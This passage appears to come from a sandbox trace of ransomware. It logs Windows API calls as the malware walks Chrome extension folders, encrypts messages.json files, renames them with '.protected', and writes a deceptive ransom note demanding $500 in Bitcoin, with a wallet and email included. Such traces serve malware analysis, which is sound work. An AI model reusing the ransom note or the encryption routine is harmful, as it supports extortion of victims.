Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\RESTORE_FILES.txt") returned 159 [0078.618] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.618] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.618] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.619] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.619] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.619] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.619] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.619] CloseHandle (hObject=0x164) returned 1 [0078.620] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.620] lstrcmpiW (lpString1="cs", lpString2="Windows") returned -1 [0078.620] lstrcmpiW (lpString1="cs", lpString2="Program Files") returned -1 [0078.620] lstrcmpiW (lpString1="cs", lpString2="Program Files (x86)") returned -1 [0078.620] lstrcmpiW (lpString1="cs", lpString2="$Recycle.bin") returned 1 [0078.620] lstrcmpiW (lpString1="cs", lpString2="System Volume Information") returned -1 [0078.620] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs") returned 141 [0078.620] lstrcmpW (lpString1="cs", lpString2=".") returned 1 [0078.620] lstrcmpW (lpString1="cs", lpString2="..") returned 1 [0078.620] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\*") returned 143 [0078.620] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.620] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.620] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.620] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.620] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.620] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.620] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\.") returned 143 [0078.620] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.620] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.620] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.620] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.620] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.620] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.620] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.621] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\..") returned 144 [0078.621] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.621] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.621] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.621] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.621] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.621] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.621] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.621] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.621] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json") returned 155 [0078.621] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.621] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.621] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.621] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.621] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.622] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json") returned 155 [0078.622] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.622] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json") returned 155 [0078.622] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.622] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json") returned 155 [0078.622] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.622] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0078.623] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.623] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0078.623] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.623] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.624] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.624] CloseHandle (hObject=0x168) returned 1 [0078.624] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.protected") returned 165 [0078.624] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.protected")) returned 1 [0078.624] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.624] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.624] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\RESTORE_FILES.txt") returned 159 [0078.625] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.625] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.625] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.626] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.626] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.626] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.626] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.626] CloseHandle (hObject=0x164) returned 1 [0078.626] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.626] lstrcmpiW (lpString1="da", lpString2="Windows") returned -1 [0078.626] lstrcmpiW (lpString1="da", lpString2="Program Files") returned -1 [0078.626] lstrcmpiW (lpString1="da", lpString2="Program Files (x86)") returned -1 [0078.626] lstrcmpiW (lpString1="da", lpString2="$Recycle.bin") returned 1 [0078.626] lstrcmpiW (lpString1="da", lpString2="System Volume Information") returned -1 [0078.626] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da") returned 141 [0078.626] lstrcmpW (lpString1="da", lpString2=".") returned 1 [0078.626] lstrcmpW (lpString1="da", lpString2="..") returned 1 [0078.626] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\*") returned 143 [0078.627] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.627] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.627] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.627] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.627] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.627] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.627] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\.") returned 143 [0078.627] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.627] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.627] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.627] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.627] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.627] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.627] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.627] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\..") returned 144 [0078.627] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.627] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.627] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.627] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.627] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.627] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.627] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.627] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.627] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json") returned 155 [0078.627] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.627] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.627] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.627] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.628] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json") returned 155 [0078.628] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json") returned 155 [0078.628] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json") returned 155 [0078.628] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.628] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0078.629] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.629] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0078.629] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.629] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.629] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.629] CloseHandle (hObject=0x168) returned 1 [0078.629] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.protected") returned 165 [0078.630] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.protected")) returned 1 [0078.630] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.630] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.630] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\RESTORE_FILES.txt") returned 159 [0078.630] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 